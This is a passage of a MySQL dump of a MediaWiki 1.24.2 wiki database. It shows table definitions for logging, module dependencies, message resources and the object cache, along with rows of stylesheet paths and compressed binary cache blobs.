TABLES; -- -- Table structure for table `logging` -- DROP TABLE IF EXISTS `logging`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `logging` ( `log_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `log_type` varbinary(32) NOT NULL DEFAULT '', `log_action` varbinary(32) NOT NULL DEFAULT '', `log_timestamp` binary(14) NOT NULL DEFAULT '19700101000000', `log_user` int(10) unsigned NOT NULL DEFAULT '0', `log_user_text` varbinary(255) NOT NULL DEFAULT '', `log_namespace` int(11) NOT NULL DEFAULT '0', `log_title` varbinary(255) NOT NULL DEFAULT '', `log_page` int(10) unsigned DEFAULT NULL, `log_comment` varbinary(255) NOT NULL DEFAULT '', `log_params` blob NOT NULL, `log_deleted` tinyint(3) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`log_id`), KEY `type_time` (`log_type`,`log_timestamp`), KEY `user_time` (`log_user`,`log_timestamp`), KEY `page_time` (`log_namespace`,`log_title`,`log_timestamp`), KEY `times` (`log_timestamp`), KEY `log_user_type_time` (`log_user`,`log_type`,`log_timestamp`), KEY `log_page_id_time` (`log_page`,`log_timestamp`), KEY `type_action` (`log_type`,`log_action`,`log_timestamp`), KEY `log_user_text_type_time` (`log_user_text`,`log_type`,`log_timestamp`), KEY `log_user_text_time` (`log_user_text`,`log_timestamp`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `logging` -- LOCK TABLES `logging` WRITE; /*!40000 ALTER TABLE `logging` DISABLE KEYS */; /*!40000 ALTER TABLE `logging` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `module_deps` -- DROP TABLE IF EXISTS `module_deps`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `module_deps` ( `md_module` varbinary(255) NOT NULL, `md_skin` varbinary(32) NOT NULL, `md_deps` mediumblob NOT NULL, UNIQUE KEY `md_module_skin` (`md_module`,`md_skin`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `module_deps` -- LOCK TABLES `module_deps` WRITE; /*!40000 ALTER TABLE `module_deps` DISABLE KEYS */; INSERT INTO `module_deps` VALUES ('mediawiki.action.edit.toolbar','cologneblue','[\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.action/mediawiki.action.edit.toolbar/mediawiki.action.edit.toolbar.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.mixins.less\"]'),('mediawiki.action.edit.toolbar','vector','[\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.action/mediawiki.action.edit.toolbar/mediawiki.action.edit.toolbar.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.mixins.less\"]'),('mediawiki.icon','cologneblue','[\"/var/www/mediawiki-1.24.2/resources/src/mediawiki/mediawiki.icon.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.mixins.less\"]'),('mediawiki.icon','vector','[\"/var/www/mediawiki-1.24.2/resources/src/mediawiki/mediawiki.icon.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.mixins.less\"]'),('mediawiki.legacy.oldshared','cologneblue','[\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.legacy/images/magnify-clip-ltr.png\"]'),('mediawiki.special','vector','[\"/var/www/mediawiki-1.24.2/skins/Vector/skinStyles/mediawiki.special.less\"]'),('mediawiki.special.preferences','vector','[\"/var/www/mediawiki-1.24.2/skins/Vector/skinStyles/mediawiki.special.preferences.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.mixins.less\",\"/var/www/mediawiki-1.24.2/skins/Vector/variables.less\"]'),('mediawiki.ui','cologneblue','[\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.ui/default.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.ui/components/forms.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.mixins.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.ui/variables.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.ui/mixins.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.ui/components/utilities.less\"]'),('mediawiki.ui','vector','[\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.ui/default.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.ui/components/forms.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.mixins.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.ui/variables.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.ui/mixins.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.ui/components/utilities.less\"]'),('mediawiki.ui.button','cologneblue','[\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.ui/components/buttons.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.mixins.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.ui/variables.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.ui/mixins.less\"]'),('mediawiki.ui.button','modern','[\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.ui/components/buttons.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.mixins.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.ui/variables.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.ui/mixins.less\"]'),('mediawiki.ui.button','monobook','[\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.ui/components/buttons.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.mixins.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.ui/variables.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.ui/mixins.less\"]'),('mediawiki.ui.button','vector','[\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.ui/components/buttons.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.mixins.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.ui/variables.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.ui/mixins.less\"]'),('mediawiki.ui.checkbox','cologneblue','[\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.ui/components/checkbox.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.mixins.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.ui/variables.less\"]'),('mediawiki.ui.checkbox','vector','[\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.ui/components/checkbox.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.mixins.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.ui/variables.less\"]'),('mediawiki.ui.input','cologneblue','[\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.ui/components/inputs.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.mixins.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.ui/variables.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.ui/mixins.less\"]'),('mediawiki.ui.input','vector','[\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.ui/components/inputs.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.mixins.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.ui/variables.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.ui/mixins.less\"]'),('skins.vector.styles','vector','[\"/var/www/mediawiki-1.24.2/skins/Vector/screen.less\",\"/var/www/mediawiki-1.24.2/skins/Vector/variables.less\",\"/var/www/mediawiki-1.24.2/skins/Vector/components/common.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.mixins.less\",\"/var/www/mediawiki-1.24.2/skins/Vector/components/animations.less\",\"/var/www/mediawiki-1.24.2/skins/Vector/components/navigation.less\",\"/var/www/mediawiki-1.24.2/skins/Vector/components/personalMenu.less\",\"/var/www/mediawiki-1.24.2/skins/Vector/components/search.less\",\"/var/www/mediawiki-1.24.2/skins/Vector/components/tabs.less\",\"/var/www/mediawiki-1.24.2/skins/Vector/components/watchstar.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.mixins.rotation.less\",\"/var/www/mediawiki-1.24.2/resources/src/mediawiki.less/mediawiki.mixins.animation.less\",\"/var/www/mediawiki-1.24.2/skins/Vector/components/footer.less\",\"/var/www/mediawiki-1.24.2/skins/Vector/components/externalLinks.less\"]'); /*!40000 ALTER TABLE `module_deps` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `msg_resource` -- DROP TABLE IF EXISTS `msg_resource`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `msg_resource` ( `mr_resource` varbinary(255) NOT NULL, `mr_lang` varbinary(32) NOT NULL, `mr_blob` mediumblob NOT NULL, `mr_timestamp` binary(14) NOT NULL, UNIQUE KEY `mr_resource_lang` (`mr_resource`,`mr_lang`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `msg_resource` -- LOCK TABLES `msg_resource` WRITE; /*!40000 ALTER TABLE `msg_resource` DISABLE KEYS */; INSERT INTO `msg_resource` VALUES ('user.options','de','{}','20151228183811'),('user.tokens','de','{}','20151228183811'); /*!40000 ALTER TABLE `msg_resource` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `msg_resource_links` -- DROP TABLE IF EXISTS `msg_resource_links`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `msg_resource_links` ( `mrl_resource` varbinary(255) NOT NULL, `mrl_message` varbinary(255) NOT NULL, UNIQUE KEY `mrl_message_resource` (`mrl_message`,`mrl_resource`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `msg_resource_links` -- LOCK TABLES `msg_resource_links` WRITE; /*!40000 ALTER TABLE `msg_resource_links` DISABLE KEYS */; /*!40000 ALTER TABLE `msg_resource_links` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `objectcache` -- DROP TABLE IF EXISTS `objectcache`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `objectcache` ( `keyname` varbinary(255) NOT NULL DEFAULT '', `value` mediumblob, `exptime` datetime DEFAULT NULL, PRIMARY KEY (`keyname`), KEY `exptime` (`exptime`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `objectcache` -- LOCK TABLES `objectcache` WRITE; /*!40000 ALTER TABLE `objectcache` DISABLE KEYS */; INSERT INTO `objectcache` VALUES ('wupperwiki:messages:de','K2.2R\ns\r\nSδ2.2Rr Tr M M\r,\r\r\rk','2038-01-19 03:14:07'),('wupperwiki:messages:en','K2.2R\ns\r\nSδ2.2Rr Tr M M\r,\r\r\rLk','2038-01-19 03:14:07'),('wupperwiki:pcache:idhash:3-0!*!*!*!*!*!*','Un6gW.Pi\"Ļ}fY$\n\"K $[S6s99\rfmfQ%K[ouEjTEf\r( NH=ҘW%&~>ł*Q&̪Xa\n/8aBF 2>s:ctζKu,Ej_\n~nhm}&ӈ4 3o*b׃[Bd*p?jc5J,̮!3@X}-RTU+|[Pk`;el+ ڨ s@Eki?t3j&lL2s1́& cTB $2]x3*o,}C@ҹYGڐp;x.\Zt7쳨A&+kFߠ7 <\\3oO-䩌JR[v/|\\LU︨\'c-d44G1t-/ap\r䳇vzmL0~U/HΨKj2>;acoHөf)m΁$}!:q#jev\Z^M፨GS\n객}|\0mВ~PjJP\"0s8*v3,;%]w4\nsbd/npAɷq_ 7NWq5&ˊ\0jݫ]~) RO+Ujq(W*@vV]m1z!7]j Wq$\nsm8T#ػ/z Cj* `)fr7?B\n$7\".tҕ-w<|2&S*\".T\\*V<7M,#','2015-12-28 23:11:03'),('wupperwiki:resourceloader:filter:minify-css:7:040406c065a521801900f3d6949ab324','{88ucl=0]{ `pb\rc?€1ݯ$ftwtcR*%RT*{.\"UŐVkټ=9.zxP7sk7#lO~]kk;>gw nX ?C;3b<΀F9V^ cdY~SI\"kG2 _\\;ۼyF|!3m``\rLo=r/wfU_~헫f_Su]7|QpC8l\"mb}@+2;\\#\ndo=Ȗ* XSO\0T٧169CX<6QDŽ\0&иXD8Wa8d.lOFN/NTa*Q!G~<,@\nV|Cs!1Q\0<cą]E[7( pakS:HA-I,K]sw`PRW K=\\Yk/ cߒ?=ZR@Js(xkX*EG4iwyTzŪQ b$)aqe4g\"؀P:BST U*<05\r Z@T;*\"px%`R\'.c>.HHYSn׾()_~߱xK`ޞv_,QwDKV貆)ġ_Qy=yŚfz(\Z_> E@W%WO){8L5rB&bwC+`o*-`qVpINN8\"煱uR:Xufi`LlczT6VU-#ilPzca_kX\'tXᬶ$c\0#LMC\\*1qn(Ƴ\nttBL\nT ,-=?_; o;/|[ 9ĵɌPw?>6@?~)B焛E@/ċD7IBa\04=Gg5ϺjP?g{RqGQ3u\Z\0A]PZsi_\r9+ʬ ʘ,4v$!ABN}IjFDNi3 apaNY0)\Zٶ\ZsN\'ڦ ҈=O糼\\A>[f9=DLCx埿!cs \0 u<\rh b`\ZplbC[\0V`%9e57$7A/hm /LOs.vOS0OK\n.LLQyNT3hA6>gn /1\07X>,oܖ\razB2hX@< Cu_@ a v~e\0|\'A2`o >|9P9g \Z`_m:u/0wڈ~ |p?ϰ;H=[c(| (ZNȹF)4O|x` ,udK?OW`Krv`Kx/,<5Z0C$KhKRT|WiÕO #G]go/!-1.t_\'⢰\":E΂6<\'QLBOZl@RM]gi]^XP\'m\"5ŇGd;]sW_Rz&e\0w1]cxyL\nPg_6,zLRב5&N;sB<0J8LT﷣C5YRDǨ>;?&.QX; Q̋[ystafj)`:jhj!BnJ4[5n&۵.ӷ+@h\nJROp$@(G=g:r\Z7qX\"ƒX p,PoxΚtR]5\0Ew\rv=T9T#G4*;\r2,hGWn\rvH!h)\0ԗFW)76j^V׫f 0%<3ZFU_.W*\0 LޏF!-C[oyhi>!E|?$hvvѤ@ŹԷ*%@]\Zlߪ:x*:M_ h/b(`opj6Qy桠@ƛC3Y}dˠ9g\\ zp推 [ጼa\0r`a]˂6yО=NS~n-:-z;f0~\0G 9j3%+< 5q20rj9qV\0q ӳd3GL`6oܮkJs=sKa`iuEӪպr<]Ñc67K/ge:\r6&ܯHJ0Vq8޲=2=BF`Tr\n?yC@c<[>#{;I`03LH(\rY{.0# +u::ܩhz h~rT(עGtaJ9)7<(cB8p aBEYgts:eI8L Ayޠ?)!h<tz:lTJ\njù\n\0V%< ʻ}!5d 3,0`j jΌ/<\'!<λO ½\0̲uI)B(2\n \Zo_YQZDJǖK τ\'v丁ΘUݿ6Gަi,H7e#z6H]5lC{\'o+j@%hrE%PNVz@]z2}vRsRvW4pI=zb]tS;^IwKL\rm!6a$51㒄deGYd;>0L<\r5PExD,\\l1bQZ\0VL q#)Nݫ U(*^މ_W #wa\0y\nUKx9zitigx[ɢapGry\ZDz=ޢkx~+L)KC\no-ɜFpJ\":4bL//\"[xS7yr57fq{q_C*#^)qQ(zk}0--_BHϵpJO&э(\\sQ|NXksWPx8ozK$FA\\N[]oK2a&ɔ~EhSXOzU0QFuxf2(~^߻}VoKf*x1:|Yh]5642?A#Cڨ&0Z㍼O,ߋb֨.EBiǖM(Ͷ+=Yggՠ9/˻`L\Z2]+.\r.Y[U;r-UZ5>\rˆ\'oI ՜*rjTQ,Y]I5GV O8D\\*-Y.ye׭yfhr3P?M0EPqsS6w Rn7hPf~*jF^2z|d(LNF=mn֝iY OyS AݬWpjqu4B +~խ7\':BnZ;J}\\~%FK}{AfZ\nR_\\]΍2ft^\\Z^nUb\n\\C:\'^Pw\\!\rE2V}k3Yp֭ Vm՗W$JA}d\\gkSd.iUuDa׷[vV\raa!2Mڭuvm?n諽1 Eq\0(\nEq*M\Z\rsrYkknr֒s}oX-XVzK\ZZDu\\5_jd);UR犝kK5a6-e.|+2PL~=K*S.r&j}(jg^pu1m pSkV}\Z hW5[5=LrV:-[u:Mea[(B\Z^UZq^ ,]F ۓחkWl[$5/6=Qzh9Qg{1([{}>!J.zyf|A]2 ñUGK{S)\'_]N4=QtP-*SmPT\\°Mi \nc&6̪w^cR?1̨JAhN!ƭhE`^k]Vwue],3FWgrZִJ헋\r\\U#޻ff\0ta4j8\06t҇0\"avZ}9R۸Yйז0dm~8ש~<6\ZӖNVC|:sвYvUuhjug豣 D:pm؜?쇀|#MJC> *m*ZذCv9\"մ.-UsNpzd=m4>-s5il[0uofͻEzj{.Ytfgl/L6[ֱ֨eUׇ[(+*rRw*X Yrm_m}ޯw-Riz+~ֿ/iڡ2i*CWd;S%U\"WN}zYth0^fumLDiB\r@UeCQ Dy3_|v]ڳ|:BmvR\nD65ƥoRST-ѯ딢V6^YZ{U~úJl mmښM7{b8\n4V˯4m~ec6aYY7W3_mn}m4:yx_j}kgP`gY Ďz\Z_;5\rKY+Oۢ8\ZMMq3Vf\\zd[\0RIw9Ļ\' # 1\' E9==\'^t)BeDܵWȸwYFQCE6NO#A. `F̝Mz׵7 iג]~s[mz13IJ3U)+LwL&Dt/:ay.^m-;ڸ:oh{v~vkN9WEs<#WY}D&tLI~\0XTm}\Z}\n}*Bdq)(wg2K.Mۻv\r=]*;dz\Z8WY\ZS |_ZEBWSo*wjs\nkVm>fKzy2$;\'9S˖CY%XY?C;ESuYym˨8?Ze_ҫuiYɺ&5*o=`˹^=\ZJj(|NlZաӬkםru\Zd4 3g\ŕPPź_%WZIsEkD\0k)r{s\Z}iۯ$7!4U.d7R>틍\\[դ0AZӀe\ZdWe9\"}TzRilƘf7YoqX;aaZI?M_Ћqn$\no\\}1](8Mf~ߪ3|V﫻ٴ3Zu;kkx#tUUզ·&KY}.\rfڠѺָkK`swWFx9ޒO \nf@XZnm^yN\n g>iȦOD^ (BO擩 diшNv\ZNVKV,uR`h`+elЭ\nLQ9679j,>ߠ\',o{һ{[][n:rAƫ3zME7O\"ɄMm{n7VAA[NYmum@Au{̴_(@yXrgJu*{Oi#zҪU\0d!#b^Ќ543D^{OpB;7}Mߨ\rPɡ? \r^D\\ui۴g;婒\"Gb<קu,\ZrÞ]hs>X)H7K%@jbzК\Zb-mMZ\nd:5)?\"E QFHxjC<O)G\nҎzΏh~ͯ+NYEpb(--ҔXk7\Z\ZUMlѢŌ%M D\0cEmܴxnMN}7#ӹyiX]Ua]V\r;zf{9ÕWVug\\\nrڒ|9pZ\0bs\0?E\rh?9Ol\Zͥ<>7>8֚t(e*u7SS&5m,%J\Z^SLo4Dji=/!1Ӳq{9iry2~#ʳZ^T̓[\\?{{u|O.l$1@9]Fo]ݗuzƅy1Ң;ppbUvJ\\{ِ#0tlV7]z͔՛֌~{-A\'*3~cFBq`Lޘoj݆VTY>>ت[ۤzŘ\rV}3NSU~>ҁ0qo7ñNB?Ǽo &r}F9צnT:&tLhJ]*vXMg fiuBiPvP)9y}^ڣv}9#Tf:LvCq4z~t߯YЂPU_}F\0?֪!K\\](Vw\n7WQd13}a7a|jpk8L-7R^w9TuڕRvwq:ua[D[{)7mQe2}c62<2Tˢu&0RKsn{խL\n@JGkDeF+HSA[ F\\RП$9]nAlbsܟ۹\'\rMsaZ.cGRNH\n|3Ț_d`ڮZ˹ݽXfÝ:+i&G vdTTZ4M]%R)$_;\\H}fpQ*SGL7ImR8Oj`6ݕR?}7D\\Ĕ ٓ=\"dyHHq3(yVz\n#Ot7u g)i\r\"L@M5YP%1H2ҥfoݏY<QF[4q╁v&Grr17m({\\f{? Z.D^@5wPˀ*o8.F53ެ@A198\\{ߛ3 #vW%^IW[X²2]ҽ6i7\n l|8aDi#\rԷn6AV&~Xb>>[fsV+ErO25B\rGh^ǫްMM^ϲ\r<\0\\9J\r:&k\r9A,^\Z\Zf[ Pۉj0oI}{\'`ނv\\0>Ș* | NWߤD\'Kc>m51Uͣu;\"gҫ6\ZYBWGkߔk~\"eij1m.is\r([Am2̞PSc&ְnM9R]\n\\{eWhݮ\n9hyl-ժ{T~,faiZ{dS)ecmOMttyZiNYTj]Hb!9wkvsY8jkOUR,L>iZu:,j:L(L^vѮjFu͒\'ѮZk7Zem25P3 ߑ^[zPW_:S/xu\nm֕|Բ6؞.aVn bҚsjXq0m\'ƦC>ӭo\rcv*mﭱ\\(jf0}ڬ$g\rOUOV5vlk鰖>uZ3fZ~?PRY\ZU#[t(;@v^\Z^]9 U_v܆LO.Ʋu8L*\0^yBSz!dKS{Ff^{\\!/kA̹I1Lh~9[6B\0Rvь-޷MzhT/ײ#]_-jN[jW^\ZZ:%tƖrebD-}`()כIv̮H*v3Rlv\'~2fƾu:Mޫa%_<~p&k3mMZ}sg!\rTZөܷJ_/BF2FPVQ\\uҜ}*TIJt[f`f4`ԩ\\7Jkʴ\rS6nCGdk{^b9[3km1;Ln![\Zټ9.G^f3z>vf@4+X+]\r\0ѩ nie]]\\WzP&|\Zq3⩔8߹jvܽ>ľq\Zɫ!\nwɡFb ^€ ;uWaw\n~X́rECwaTڢ$E{$qT\\O| (#S_<OiQ%TەdL{(e\ZKC\0>`ag~zyKx0o=mzb{BHqw2?Kx1Mv!1b|GW43I׉=&\"bॅ8I\\KL\Z1cĪ?U#`9z=N2lV㎸ϝMƓH!\r-=bO\r9 u_Fɩ83E]H[+C-7xjzƊ֮6T޵^vjZ˗|t›Ka~\'OOk>4/\Zr!|r-EMgZJ6dsV1- a,K*eKcu\'9E#( D,\rv33r4PU]8Օbku>Hy)O~/Q\r.ɗ,\n{+X_.2G>Osڍ{y/\'\\R:ΣXT\')8DW\"c0/,kkm{.`d܅?KVc 9X\Z:)?kb\";DDL74Gq}cjtRqS<Ƿ\09(9fS}I&)SC/^d\rﱊtWf\rj֜T*MSR^ToC鮏|kzn;(LLx`=CF2\0k>y8Ǐ!GIP V.l>Іyv%tFmKXHgT-7~#7t![41;@C4%÷ )Wr>z\\MkECO07J%ffT\ZD0\\ zA\0V5\\㮂osib\n#c@QDEmfsK}uHӆ-/9ZC?}з|\0DŽ4EQ]}VB2o+8[aF5KPu\rk#zZ GsvPkaFKY0 608j,2B +C;+{Ay6]cv=#ufɎ\04U83iXp˽G\Z_U㐩jn{Nz\n41\0ب9hjN\Zi&.G>|?Pb[B4w*KS>ǰwhA\0}7&7v%MK `~Jo; O1Ω\0lfq&˽?\\>[~39\\#`y>6Y7`,t1/w1f-?nx:_h\\vz;j+\\yxS~P5`߀7/D.P^Rh4a~7A:m\"`<A9C<|ؼ@ t@8\0>29]B\0Ӹ< ڷ\r,x|{\0~2 _@VpY~\nI);})\rjM`{x/l_\0`91k0g?\rxje3}~w0W07\0Q>s6`oVfdHY0_ hr \n?$\Z% /zخa\'Hc2 M0ขeΪ`1@]iN9m>r\'77.h}\r\'K \"Jmˢ/Г5:z9bȋ7f;$jhp||ǠB\'i\"m>)e) i\n9Yfm^\\0ɸ)cQ׺y8kH1ZkP)S>}JB)f\0P[|ܮ>:ŋ,FgTJZrPs\0d,$TKq!;\Z8 9Ғl%\rHla#}RJ?*X`}KI-d[a@3P/`\0~\0N%=〕$,cZʯ+gav.&X-ML\']usdK5X%[Fڨoko\rA믄ja{hx 1FKv\'4,=n_z\r~IxB)Z\"Y<BډS6as@XH\"E29-\\ЬA_`]d_ET\'V{h8܃ng#]^*t[[P8ӑdٳl8\nysfJVyp`h9l㢌^ca7WQ6ucVH ajsrfV#ϓk:i6dƣsZ5u05a\n40 <\0\rS+#Sh=m[z@^ e\n谾uփx\n۬Ωh+Mzp\\\0`.skt#3Ȗq\r]0\0>h7/bx`Ccz7dL9Fb{hpϛZ1ѻ>4 cJ(\rb.Gr+42\\vưg~|ɃCZDX{G~2/8 B,_JNɏGn?5b$?\nߍ3#)\"Gy[S)PJԹ@PnjG/?yOqŤ$$\rÿZWR?;7O|_pͣ#?4YcqoXhH83#\\1#o\n4KDø4AߎP|KPa]ܪQPZԻҩ? G͟I|m⑒{iq/m4wLJ0Tb]¯_>bA 逿XC0jwj\0(W\n㕟$\ZO\n0^wW!b~\0{u\rX1?]t[\n \Z\rIV&g;&* a606Šӧ6 |it}0 vm|凰\0V}_8PA}~ȑ`n\\́BeEлz ; /&~t~k\\\\/َ7%s\0  T8J$(;bm/ȣHtvq%Bdk>2V@=)!ŊhvzL`r+V |`^vN:(+ :uKUH\'wfG*]%8iwZ|•\ZSmѨjuMӃݵ*6y@g;ϦYR<_u2RǶ5\n\0]+\0 97!F [ w-*\n1)C MRP\"ю]BHwv,@/3?nO{15x9\rrԌ}{<4R)PhYk19Ua^EY‹Os\0e\n\0 v\0]0P]-*@=S,h>y@J*Q^,s$M[yz\0j~@+a̞ G9}r~HI2.^lfKEkwXQd+Wށ#Fh_N +o.+RHUȚ]{Ѽ[HOȅ ՝ה8!&8.=.ǝO^5DMSmtWe\r_GUº7cIn~Qφ\\\"7^RSR;H~7Kb!/drҺI_QNf9UVd[I\njd8DGΨtafF9-\'XPv1bz.|NΡal71en 5X4BH\0.pЀO8cJ\nF $A]\re ϒ?ʴUIDQMho=H(oGt\'Ljy`Kc=Y|SS(9Rm\"LΑ쒳#My$XPmGQux0\0luwv%h.(&oNed(d+sfuW2|eBVs`tHSj\r2iuq lˣB+- iX\rM:P܆Z[Tbkg?հ]ݜT[P%—<o)|>ɩJ@C[0Up-C{ȓ1i0k&|xGï?ja`WڱN>@f/@ߘU\n.jAvآ<\r2$Ba[v͟`%v.նIi惕)o~N%Yp때fzc\r:!3n\"HIU;1$ n8*ᘮ>u\'Ѫ\"cŕN A.b|j.\'$nlO[p^Xw;\r+p]PˋD`%*q@b9y٥@fM~ǍSވ\'ukٝ&;)֝L0cWEvg\n0|i%ϛ_/hqi~&u]q%[OEUo@4-]==o.|?/ij~osxc7E%\no4_2_o?5Ewo8XJ\0غ\'L\\!bz)CڨS0.7RU1maK(.%Vr>\\&T]v3XZr׽8x\nA;rS< ]PUY׹j%C5{oETU39gsC\\y:5F}n{a&@׊/T^*X@ gzFxm$[a}⪅J&!=Wϓ7s 21hGJ]֥ieSb?K\ZCWmc\\ȎjmH\0\"\0w>g6F6vu_Ca8u=55 w\ZЍDevG\nIu?˘2(MRaRÞ\n:蕏p>k7>Ƃ^Kx{cgJ)\\Qade/vs^̽cm`Mg#{˲&F~^T@*o XV R] ڪwU\0ct⧔(| Ѐ)^l Yn4a`r#B(N^l2;bhj8dSY;xJm0Nj3c {Fao[[mo)RӣBm6;>NJcߩ>0/VCe%fjPP~=/Y蚵=_eQjA鳱Porx=vЅr]YqN`yY~ÒwqHQXO̴Ɇ9Uituǔ%,R6uUƩX\\Dg\ZD9Cb˾d[._}d5?(lEE:#owM;x4y\\A4g[[r]h.&ܗ9l~-wD{084ըiV\nVVfJA`cxS;ip˷l~ee\0Gs{&(ģWOT\reBi-Dfu}RLK7NH|H q@)LsP福,cZ,!CϜ!r!Hƻ3F//]tpO@\Z(;k uM\rKT!~-jC½UEQl%7ȋ\rpy&vr˞w[AVE ','2038-01-19 03:14:07'),('wupperwiki:resourceloader:filter:minify-css:7:0c762e508e2842b57023ce979869e38a','k⺒(cYkWQe̻*f167L=al~P0PQHUի{f^زJRTJKrx۪bHwl=<(Wqãg;q7ٵq>+uPN\0qHg,c>\04 U7EuEfZUCv$]ֆo`e|/[+x=(\'[akfsRaNZ÷nufeI!3 g=l0V7\"m(QQT[I̳\0$M͸\\ \nl@UWfZo\0\0IT=\"MZvVo{q+]rUosI^jk@ZF/os@-5y&^VLo76osR׭VC l2\nyZʻIZ}G\0R=}$U}VQɮݵZ]mU.$Ϡ 3syyqwzaݸ\"7r5^KDYk+w͋m8 %CI66L 4XڬTWO)swKZp^:`PIFLѷE=7ڿ=cGǨ :%5ٗF#3 \n5/hEzi EQQھÑ #0`%+#Y<@X;uol+`dHc.=zAztT-\\\"PhQT]#\0\rww yg@a*/߬[LFIs*pe2?ͽ$N%)0z굸%/>hq\Zshk.% ,^.ȣ ao14ԻT\"1ko` s|*_\"dy\0M٨y\'Rd\r4E\Z~\nLow,{L;\0Ƚoкp64e\\Z?|W@ʾ:+ȯ2f2 \rg%\'xD6DPHre:$*)jmjr -GrAtӳF9DžJ`zEkJ m-RJ}]ӳ҄2y][9ar40\r{j1`O =%:;SR\"~ݢ+Z8#R3ɝVuiLd)jIQ,]PI֪\rhwkuJ\n\'\\gYp8<*d\'3۵zOZ~BLTMOQޓR]?$-d\\&d3ANù20u}}W \0qM9Ir%9w m\0PMpdֹdIhAF EϱS*Dhy0%U`J>L W>PSEq\rl$X9+ڡ\0\n\n\r2ek VeȁC:W$*8khkI1<`<Ću\Z]}MGvs0~猪5ݬnmgGz@3|Yo±oJwN)#v0;wu\nwmTuOٖ7g;s@\n\0 6N\"6@z.D۔A\Z|7\Z?€+Gq+,Ǡ |\0Ϡ7\"wc.7< xKD,abs~>/ۦXV0<e;`I@Y<\rQ?\Z%:0\\\0ii\nɁzI)*ډx&{ yu@^\0cn|?Z m-S1`Hx\rdx|Gm5eo|хAxteNqxe߃hHe>srf 